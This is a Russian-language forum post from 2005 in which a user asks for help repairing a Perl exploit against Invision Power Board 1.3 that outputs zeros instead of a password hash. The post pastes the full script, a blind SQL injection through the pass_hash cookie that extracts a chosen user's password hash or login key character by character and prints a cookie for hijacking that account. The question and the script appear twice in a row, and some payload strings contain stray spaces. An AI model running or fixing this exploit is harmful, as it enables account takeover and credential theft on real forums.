Otaku
10.09.2005, 05:37
Откопал эксплойт.
Выдаёт нули вместо хэша.
Тестил на ipb 1.3. Другие эксплойты срабатывают.
Я перле пока не силён. Пробовал разные варианты,но починить этот сплойт не могу. :confused:
Кто нибудь может подсказать где тут ошибка? :( :(
Ничего толкового не нашёл.
Замучался уже.
use IO::Socket;
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $host = $ARGV[0]; # hostname
my $path = $ARGV[1] . 'index.php?act=Login&CODE=autologin';
my $user = $ARGV[2]; # userid to jack
my $iver = $ARGV[3]; # version 1 or 2
if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" }
my $dbug = $ARGV[5]; # debug?
if (!$ARGV[3])
{
print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
M1:
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*";
$cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Cookie: $cookie\n";
print $socket "Connection: close\n\n";
# If we get a valid sql request then this
# does not appear anywhere in the Location header
$pattern = 'act=Login&CODE=';
$failed = 0;
while(<$socket>)
{
if($dbug) { print };
if(/$pattern/) { $failed = 1; }
}
if($failed==0){
$outputs .= $current;
print "$i char: $current\n";
next M1;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
Выдаёт нули вместо хэша.
Тестил на ipb 1.3. Другие эксплойты срабатывают.
Я перле пока не силён. Пробовал разные варианты,но починить этот сплойт не могу. :confused:
Кто нибудь может подсказать где тут ошибка? :( :(
Ничего толкового не нашёл.
Замучался уже.
use IO::Socket;
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $host = $ARGV[0]; # hostname
my $path = $ARGV[1] . 'index.php?act=Login&CODE=autologin';
my $user = $ARGV[2]; # userid to jack
my $iver = $ARGV[3]; # version 1 or 2
if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" }
my $dbug = $ARGV[5]; # debug?
if (!$ARGV[3])
{
print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
M1:
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*";
$cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Cookie: $cookie\n";
print $socket "Connection: close\n\n";
# If we get a valid sql request then this
# does not appear anywhere in the Location header
$pattern = 'act=Login&CODE=';
$failed = 0;
while(<$socket>)
{
if($dbug) { print };
if(/$pattern/) { $failed = 1; }
}
if($failed==0){
$outputs .= $current;
print "$i char: $current\n";
next M1;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;